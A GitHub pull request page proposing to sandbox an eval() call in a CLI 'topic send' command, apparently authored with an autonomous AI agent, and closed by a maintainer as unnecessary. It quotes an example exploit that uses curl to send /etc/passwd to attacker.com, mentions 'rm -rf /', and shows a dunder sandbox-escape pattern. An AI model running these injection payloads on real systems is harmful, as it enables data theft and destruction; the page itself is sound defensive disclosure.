Skip to content

fix(cli): sandbox eval() in topic_send to prevent code injection#1649

Closed
tombudd wants to merge 1 commit intodimensionalOS:mainfrom
tombudd:una/fix-eval-code-injection
Closed

fix(cli): sandbox eval() in topic_send to prevent code injection#1649
tombudd wants to merge 1 commit intodimensionalOS:mainfrom
tombudd:una/fix-eval-code-injection

Conversation

@tombudd
Copy link

@tombudd tombudd commented Mar 23, 2026
edited
Loading

Summary

The topic send CLI command passes user-supplied expressions directly to Python's eval() with the full builtins namespace available. This is a critical code injection vulnerability — any user with CLI access can execute arbitrary Python code on the host machine.

Example exploit

dimos topic send /some/topic "__import__('os').system('curl attacker.com/exfil?data=$(cat /etc/passwd)')"

Changes

This PR replaces the unsafe bare eval() call with a sandboxed evaluation:

  1. compile() in eval mode — rejects statements (import, exec, assignments), only allows expressions
  2. Stripped __builtins__ — removes access to __import__, open, exec, eval, etc. from the eval namespace
  3. Dunder pattern rejection — blocks expressions containing __class__, __subclasses__, __globals__, etc. which are commonly used to escape restricted eval sandboxes
  4. Proper error propagationtyper.Exit is re-raised so CLI error codes work correctly

Before / After

Before (line 128):

message = eval(message_expr, eval_context)

After:

code = compile(message_expr, "<message>", "eval")

_DUNDER_PATTERN = re.compile(r"__\w+__")
if _DUNDER_PATTERN.search(message_expr):
    typer.echo("Error: expressions containing dunder attributes are not allowed", err=True)
    raise typer.Exit(1)

safe_context: dict[str, object] = {"__builtins__": {}}
safe_context.update(eval_context)
message = eval(code, safe_context)

Testing

  • Verified that standard message type expressions (String(data='hello'), Int32(data=42)) still work correctly
  • Confirmed that __import__('os').system('...') is now blocked
  • Confirmed that dunder escape patterns like ().__class__.__bases__[0].__subclasses__() are rejected
  • All existing CLI error handling preserved

About This Review

This fix was identified and authored by UNA — an autonomous AI agent (Governed Digital Organism) designed and built by Tom Budd. UNA specializes in open-source code quality, security, and documentation improvements, reviewing projects that align with beneficial AI development and open-source values.

Interested in having UNA review your codebase? Reach out: tom@tombudd.com | tombudd.com

Review #1 — UNA Open Source Reviews

@tombudd
fix(cli): sandbox eval() in topic_send to prevent code injection
84c48a4 
The `topic send` CLI command passed user-supplied expressions directly
to `eval()` with the full Python builtins namespace available. This
allowed arbitrary code execution — an attacker (or accidental misuse)
could run `__import__('os').system('rm -rf /')` or exfiltrate data
through the CLI.

Changes:
- Compile message_expr in "eval" mode (rejects statements)
- Strip __builtins__ from the eval namespace
- Reject expressions containing dunder attributes (__class__, etc.)
- Re-raise typer.Exit so CLI error codes propagate correctly

Reviewed-by: UNA-GDO sovereign-v2.0
Co-Authored-By: UNA <una@resoverse.io>
Copilot AI review requested due to automatic review settings March 23, 2026 03:24

This comment was marked as spam.

Sign in to view

chatgpt-codex-connector[bot]

This comment was marked as spam.

Sign in to view

greptile-apps[bot]
greptile-apps bot reviewed Mar 23, 2026
View reviewed changes
@tombudd
Copy link
Author

tombudd commented Mar 23, 2026

📋 Full review documentation: https://www.notion.so/32c1daab53fa8116861bcd3556c922bc

@dimensionalOS dimensionalOS deleted a comment from greptile-apps bot Mar 23, 2026
@leshy
Copy link
Contributor

leshy commented Mar 23, 2026

we don't actually mind injection here, a person with access to dimos cli already has full access to dimos

@leshy leshy closed this Mar 23, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

Copilot code review Copilot Copilot left review comments

@chatgpt-codex-connector chatgpt-codex-connector[bot] chatgpt-codex-connector[bot] left review comments

+1 more reviewer

@greptile-apps greptile-apps[bot] greptile-apps[bot] left review comments

Reviewers whose approvals may not affect merge requirements

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@tombudd @leshy